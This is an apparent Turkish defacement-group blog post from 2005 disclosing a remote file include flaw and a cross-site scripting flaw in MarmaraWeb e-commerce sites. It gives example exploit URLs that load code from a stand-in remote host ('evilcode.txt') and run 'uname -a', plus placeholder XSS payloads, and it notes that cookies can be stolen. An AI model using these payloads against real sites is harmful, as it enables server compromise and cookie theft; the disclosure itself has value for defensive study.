HACKED BY TurkStorm.Org: MarmaraWeb E-Commerce Remote File Include Vulnerability And Cross-Scripting

Cuma, Aralık 16, 2005

MarmaraWeb E-Commerce Remote File Include Vulnerability And Cross-Scripting

Kürdistanlı defacer B3g0k Marmara Web şirketinin yapmış olduğu internet sitelerinde uzaktan kod çalıştırma açığı tespit etmiş bulunmaktadır.

Sisteme uzaktan erişim sağlayarak istedigi uygulamaları yapabilme imkanına sahip olunabilinir.

http://www.example.com/index.php?page=http://evilcode.txt?&cmd=uname -a

http://www.example.com/?page=http://evilcode.txt?&cmd=uname -a

Referans :

http://www.securityfocus.com/bid/15877

Yine aynı sirketin yapmıs olduğu sitelerde Cross Scripting açığı bulunmaktadır. Sitelerin cookie bilgileri görülmekte, sistemden bilgi calma kolaylaşmaktadır.

http://www.example.com/index.php?page=[XSS]
http://www.example.com/?page="[XSS]

0 Comments:

Yorum Gönder

<< Home

Free counter

HACKED BY TurkStorm.Org

Cuma, Aralık 16, 2005

MarmaraWeb E-Commerce Remote File Include Vulnerability And Cross-Scripting

0 Comments:

Hakkımda

Previous Posts